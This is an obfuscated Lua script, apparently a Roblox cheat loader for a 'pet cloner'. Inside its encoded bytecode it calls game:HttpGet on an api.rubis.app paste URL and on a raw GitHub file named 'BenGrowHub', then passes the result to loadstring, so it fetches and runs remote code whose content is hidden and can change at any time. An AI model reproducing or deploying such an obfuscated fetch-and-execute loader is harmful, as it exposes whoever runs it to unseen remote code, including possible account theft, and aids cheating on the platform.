--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v80=0;local v81;while true do if (v80==0) then v81=v2(v0(v30,16));if v19 then local v106=v5(v81,v19);v19=nil;return v106;else return v81;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v82=(v31/((5 -(3 + 0))^(v32-(1 + 0 + 0))))%((5 -3)^(((v33-(1 -0)) -(v32-(878 -(282 + 595)))) + (2 -1))) ;return v82-(v82%(620 -(555 + 64))) ;else local v83=0 + 0 ;local v84;while true do if (v83==(931 -(857 + (1031 -(892 + 65))))) then v84=(570 -(367 + (479 -278)))^(v32-(928 -(214 + 713))) ;return (((v31%(v84 + v84))>=v84) and ((1388 -(32 + 85)) -(226 + 1044))) or ((0 -0) -0) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (3 -1) );v18=v18 + (352 -(87 + 263)) ;return (v36 * 256) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (7 -4) );v18=v18 + 3 + 1 ;return (v40 * (66680831 -49903615)) + (v39 * (65716 -((180 -113) + 113))) + (v38 * (188 + 68)) + v37 ;end local function v24() local v41=0 -0 ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==(0 + 0)) then v42=v23();v43=v23();v41=998 -(719 + 196 + 82) ;end if (v41==(8 -5)) then if (v46==(0 + 0)) then if (v45==(0 -0)) then return v47 * (1187 -(1069 + 118)) ;else local v107=0 -0 ;while true do if (v107==(0 -0)) then v46=1 -(1055 -(87 + 968)) ;v44=0 + (0 -0) ;break;end end end elseif (v46==(3636 -1589)) then return ((v45==(0 + 0 + 0)) and (v47 * ((792 -((831 -463) + 423))/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(1041 -(10 + 8)) ) * (v44 + (v45/((1082 -((2433 -(447 + 966)) + 60))^(199 -147)))) ;end if (v41==(1425 -(630 + 793))) then v46=v20(v43,21,104 -73 );v47=((v20(v43,474 -(416 + 26) )==(3 -2)) and  -(3 -2)) or (1748 -(760 + 987)) ;v41=2 + 1 ;end if (v41==(1 -0)) then v44=439 -(145 + 293) ;v45=(v20(v43,767 -(745 + 21) ,450 -(44 + (1056 -670)) ) * ((5 -3)^(1518 -(998 + 488)))) + v42 ;v41=1 + 1 ;end end end local function v25(v48) local v49;if  not v48 then local v85=(1831 -(9 + 5)) -((2079 -(85 + 291)) + 114) ;while true do if (v85==((1265 -(243 + 1022)) -0)) then v48=v23();if (v48==(0 + 0)) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -1 );v18=v18 + v48 ;local v50={};for v64=702 -(376 + 325) , #v49 do v50[v64]=v2(v1(v3(v49,v64,v64)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return 0 + 0 ;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();while true do if (v51==0) then local v88=(function() return 0 + 0 ;end)();local v89=(function() return;end)();while true do if (v88==(0 -0)) then v89=(function() return 0 -0 ;end)();while true do if (v89~=2) then else v51=(function() return  #"[";end)();break;end if (v89==1) then v54=(function() return {};end)();v55=(function() return {v52,v53,nil,v54};end)();v89=(function() return 1 + 1 ;end)();end if (v89==0) then v52=(function() return {};end)();v53=(function() return {};end)();v89=(function() return 1637 -(1373 + 263) ;end)();end end break;end end end if (v51~=(1002 -(451 + 549))) then else for v91= #"<",v23() do local v92=(function() return v21();end)();if (v20(v92, #".", #".")==0) then local v101=(function() return 0;end)();local v102=(function() return;end)();local v103=(function() return;end)();local v104=(function() return;end)();while true do if (v101==(1 + 2)) then if (v20(v103, #"nil", #"asd")~= #"{") then else v104[ #"0313"]=(function() return v57[v104[ #".com"]];end)();end v52[v91]=(function() return v104;end)();break;end if (v101~=2) then else if (v20(v103, #"|", #",")~= #"\\") then else v104[2]=(function() return v57[v104[2]];end)();end if (v20(v103,2,2 -0 )~= #"}") then else v104[ #"19("]=(function() return v57[v104[ #"91("]];end)();end v101=(function() return 4 -1 ;end)();end if (v101~=1) then else v104=(function() return {v22(),v22(),nil,nil};end)();if (v102==0) then local v119=(function() return 0;end)();local v120=(function() return;end)();while true do if (v119~=(1384 -(746 + 638))) then else v120=(function() return 0 + 0 ;end)();while true do if (v120==(0 -0)) then v104[ #"nil"]=(function() return v22();end)();v104[ #"asd1"]=(function() return v22();end)();break;end end break;end end elseif (v102== #"/") then v104[ #"-19"]=(function() return v23();end)();elseif (v102==(343 -(218 + 123))) then v104[ #"-19"]=(function() return v23() -(2^16) ;end)();elseif (v102== #"91(") then local v188=(function() return 1581 -(1535 + 46) ;end)();local v189=(function() return;end)();while true do if (v188==0) then v189=(function() return 0 + 0 ;end)();while true do if (v189~=0) then else v104[ #"91("]=(function() return v23() -(2^16) ;end)();v104[ #"0836"]=(function() return v22();end)();break;end end break;end end end v101=(function() return 1 + 1 ;end)();end if (v101==0) then local v114=(function() return 560 -(306 + 254) ;end)();while true do if (v114~=0) then else v102=(function() return v20(v92,1 + 1 , #"xnx");end)();v103=(function() return v20(v92, #"0313",6);end)();v114=(function() return 1;end)();end if (1==v114) then v101=(function() return 1 -0 ;end)();break;end end end end end end for v93= #"<",v23() do v53[v93-#"/" ]=(function() return v28();end)();end return v55;end if (v51== #"<") then local v90=(function() return 0;end)();while true do if (v90~=2) then else v51=(function() return 1469 -(899 + 568) ;end)();break;end if (v90==0) then v56=(function() return v23();end)();v57=(function() return {};end)();v90=(function() return 1;end)();end if (v90==(1 + 0)) then for v108= #"/",v56 do local v109=(function() return 0;end)();local v110=(function() return;end)();local v111=(function() return;end)();local v112=(function() return;end)();while true do if (v109~=0) then else local v115=(function() return 0 -0 ;end)();while true do if (v115==(604 -(268 + 335))) then v109=(function() return 291 -(60 + 230) ;end)();break;end if (v115==0) then local v164=(function() return 572 -(426 + 146) ;end)();while true do if (v164==(1 + 0)) then v115=(function() return 1;end)();break;end if (v164==(1456 -(282 + 1174))) then v110=(function() return 811 -(569 + 242) ;end)();v111=(function() return nil;end)();v164=(function() return 1;end)();end end end end end if (v109==(2 -1)) then v112=(function() return nil;end)();while true do if (v110~=(0 + 0)) then else local v165=(function() return 1024 -(706 + 318) ;end)();local v166=(function() return;end)();while true do if ((1251 -(721 + 530))~=v165) then else v166=(function() return 1271 -(945 + 326) ;end)();while true do if (0~=v166) then else v111=(function() return v21();end)();v112=(function() return nil;end)();v166=(function() return 1;end)();end if (v166~=1) then else v110=(function() return  #":";end)();break;end end break;end end end if (v110~= #"]") then else if (v111== #"}") then v112=(function() return v21()~=(0 -0) ;end)();elseif (v111==(2 + 0)) then v112=(function() return v24();end)();elseif (v111~= #"gha") then else v112=(function() return v25();end)();end v57[v108]=(function() return v112;end)();break;end end break;end end end v55[ #"xxx"]=(function() return v21();end)();v90=(function() return 2;end)();end end end end end local function v29(v58,v59,v60) local v61=v58[701 -(92 + 179 + 429) ];local v62=v58[2 + 0 ];local v63=v58[1503 -(1408 + (215 -123)) ];return function(...) local v66=v61;local v67=v62;local v68=v63;local v69=v27;local v70=1087 -(461 + 625) ;local v71= -(1289 -(993 + 295));local v72={};local v73={...};local v74=v12("#",...) -1 ;local v75={};local v76={};for v86=0 + 0 ,v74 do if ((630<2127) and (v86>=v68)) then v72[v86-v68 ]=v73[v86 + (1172 -(418 + 753)) ];else v76[v86]=v73[v86 + 1 ];end end local v77=(v74-v68) + 1 ;local v78;local v79;while true do local v87=0;while true do if (((0 + 0)==v87) or (1938==2514)) then v78=v66[v70];v79=v78[1 + 0 ];v87=1 + 0 ;end if (v87==(1 + 0)) then if (v79<=((1735 -(373 + 829)) -(406 + 123))) then if ((4255>=55) and (v79<=(1770 -((2480 -(476 + 255)) + 20)))) then if (v79>((1130 -(369 + 761)) + 0)) then local v121=(765 + 557) -(1249 + 73) ;local v122;local v123;local v124;local v125;while true do if (v121==(1 + 1)) then for v180=v122,v71 do local v181=1145 -(466 + 679) ;while true do if ((2999>1156) and (v181==(0 -0))) then v125=v125 + (2 -1) ;v76[v180]=v123[v125];break;end end end break;end if (1==v121) then v71=(v124 + v122) -(1901 -(106 + 1794)) ;v125=0 + 0 ;v121=1 + 1 ;end if (v121==((0 -0) -0)) then v122=v78[5 -3 ];v123,v124=v69(v76[v122](v13(v76,v122 + 1 ,v78[117 -(4 + (208 -98)) ])));v121=585 -(57 + 527) ;end end else v76[v78[1429 -(41 + 1386) ]]();end elseif ((2350>1155) and (v79<=(105 -(17 + 86)))) then do return;end elseif (v79==((241 -(64 + 174)) + 0)) then v76[v78[(1 + 2) -1 ]]=v78[8 -5 ];else v76[v78[168 -((180 -58) + (380 -(144 + 192))) ]]=v78[3]~=(0 -(216 -(42 + 174))) ;end elseif ((4029<=4853) and (v79<=(19 -13))) then if (v79>(5 + 0)) then local v126;local v127,v128;local v129;v76[v78[1 + 1 ]]=v78[5 -2 ];v70=v70 + (66 -(30 + 35)) ;v78=v66[v70];v129=v78[2];v127,v128=v69(v76[v129](v13(v76,v129 + 1 + 0 ,v78[1260 -(1043 + 214) ])));v71=(v128 + v129) -(3 -2) ;v126=1212 -(323 + 668 + 221) ;for v159=v129,v71 do local v160=0 -0 ;while true do if ((0 + 0)==v160) then v126=v126 + (581 -(361 + 219)) ;v76[v159]=v127[v126];break;end end end v70=v70 + 1 ;v78=v66[v70];v129=v78[(137 + 185) -(53 + (1771 -(363 + 1141))) ];v76[v129]=v76[v129](v13(v76,v129 + 1 ,v71));v70=v70 + 1 + (1580 -(1183 + 397)) ;v78=v66[v70];v76[v78[415 -(15 + 398) ]]();v70=v70 + (983 -(18 + 964)) ;v78=v66[v70];do return;end else local v136;local v137,v138;local v139;local v140;v76[v78[7 -5 ]]=v60[v78[2 + 1 ]];v70=v70 + 1 + 0 ;v78=v66[v70];v76[v78[852 -(20 + 830) ]]=v60[v78[3 + 0 ]];v70=v70 + 1 ;v78=v66[v70];v140=v78[128 -(116 + (30 -20)) ];v139=v76[v78[1 + 2 ]];v76[v140 + (739 -(542 + 196)) ]=v139;v76[v140]=v139[v78[8 -4 ]];v70=v70 + 1 + 0 ;v78=v66[v70];v76[v78[2 + 0 ]]=v78[3 + 0 ];v70=v70 + 1 + 0 ;v78=v66[v70];v76[v78[4 -2 ]]=v78[7 -4 ]~=(1551 -(1126 + 425)) ;v70=v70 + 1 ;v78=v66[v70];v140=v78[407 -(118 + 287) ];v137,v138=v69(v76[v140](v13(v76,v140 + (3 -2) ,v78[1124 -(118 + 1003) ])));v71=(v138 + v140) -(2 -1) ;v136=(282 + 95) -(142 + (2210 -(1913 + 62))) ;for v161=v140,v71 do local v162=0 -0 ;while true do if ((0 + 0)==v162) then v136=v136 + (978 -(553 + 424)) ;v76[v161]=v137[v136];break;end end end v70=v70 + (1 -0) ;v78=v66[v70];v140=v78[2 + 0 ];v76[v140]=v76[v140](v13(v76,v140 + 1 ,v71));v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]();v70=v70 + (2 -1) + 0 ;v78=v66[v70];v76[v78[2 + 0 ]]=v60[v78[2 + 1 ]];v70=v70 + 1 + 0 ;v78=v66[v70];v76[v78[2 + 0 ]]=v60[v78[6 -3 ]];end elseif (v79<=(19 -12)) then v76[v78[2]]=v60[v78[6 -(1936 -(565 + 1368)) ]];elseif (v79==(3 + (18 -13))) then local v171=v78[9 -(1668 -(1477 + 184)) ];v76[v171]=v76[v171](v13(v76,v171 + (754 -(239 + 514)) ,v71));else local v173=v78[1 + 1 ];local v174=v76[v78[3]];v76[v173 + 1 ]=v174;v76[v173]=v174[v78[1333 -(797 + 532) ]];end v70=v70 + (1 -0) + 0 ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!053Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403333Q00682Q7470733A2Q2F6170692E72756269732E612Q702F76322F73637261702F4D7241485A4357456159436A4B7434692F72617703543Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F4E656D657369732D6C61672F506574436C6F6E657256322F726566732F68656164732F6D61696E2F42656E47726F7748756200103Q0012053Q00013Q00122Q000100023Q00202Q00010001000300122Q000300046Q000400016Q000100049Q0000026Q0001000100124Q00013Q00122Q000100023Q002009000100010003001206000300056Q000100039Q0000026Q000100016Q00017Q00",v9(),...);
